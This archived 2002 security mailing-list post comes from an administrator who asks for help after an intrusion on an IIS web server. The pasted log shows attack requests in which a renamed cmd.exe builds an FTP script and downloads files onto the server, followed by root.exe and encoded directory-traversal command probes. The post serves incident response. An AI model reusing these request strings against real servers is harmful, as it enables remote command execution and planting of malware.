IIS Server Log security breach?

From: GP (gpmobileat_private)
Date: Tue Feb 26 2002 - 13:09:15 PST

Next message: Rzac`: "Re[2]: Determining the country of orgin for IP address(es)"

Previous message: Rich Puhek: "Re: Scan combining internal/external"
Next in thread: zeno: "Re: IIS Server Log security breach?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

   Help,   I recently found this on my IIS server after being contacted
 that my webserver attempted to scan someone's machine on port 80.  I've
 looked on my web box and found the following files were installed
 msxc32.exe which seems to be Mirc program which is some type of chat
 program.  I've talked to other techs here who have not installed this
 program.  I've traced the following ip addresses back to the domain
 admins but before I contact I need to know if this is the intruder's ip
 address and what would be the best course of action. On the flip side
 what do I need to do to prevent this from happening in the future?  I
 have since blocked these addresses but this is only a temp fix.

 18:56:21 156.63.205.48 GET
 /iisadmpwd/fuck.exe?/c+echo+get+shouldNT32.ocx+c:shouldNT32.ocx>>xl32.scr
 502
 18:56:23 156.63.205.2 GET
 /iisadmpwd/fuck.exe?/c+echo+get+shtlng32.dll+c:shtlng32.dll>>xl32.scr 502
 18:56:25 156.63.205.48 GET
 /iisadmpwd/fuck.exe?/c+echo+get+smba.dll+c:smba.dll>>xl32.scr 502
 18:56:27 156.63.205.2 GET
 /iisadmpwd/fuck.exe?/c+echo+get+sndrec32.dl_+c:sndrec32.dl_>>xl32.scr 502
 18:56:33 156.63.205.48 GET
 /iisadmpwd/fuck.exe?/c+echo+get+thds32.exe+c:thds32.exe>>xl32.scr 502
 18:56:35 156.63.205.2 GET
 /iisadmpwd/fuck.exe?/c+echo+get+winsd32.ocx+c:winsd32.ocx>>xl32.scr 502
 18:56:37 156.63.205.48 GET
 /iisadmpwd/fuck.exe?/c+echo+get+holes.txt+c:holes.txt>>xl32.scr 502
 18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502
 18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502
 20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404
 20:20:36 216.158.145.245 GET /MSADC/root.exe?/c+dir 404
 20:20:36 216.158.145.245 GET /c/winnt/system32/cmd.exe?/c+dir 404
 20:20:36 216.158.145.245 GET /d/winnt/system32/cmd.exe?/c+dir 404
 20:20:36 216.158.145.245 GET
 /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
 20:20:36 216.158.145.245 GET



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Rzac`: "Re[2]: Determining the country of orgin for IP address(es)"
Previous message: Rich Puhek: "Re: Scan combining internal/external"
Next in thread: zeno: "Re: IIS Server Log security breach?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Feb 26 2002 - 15:09:01 PST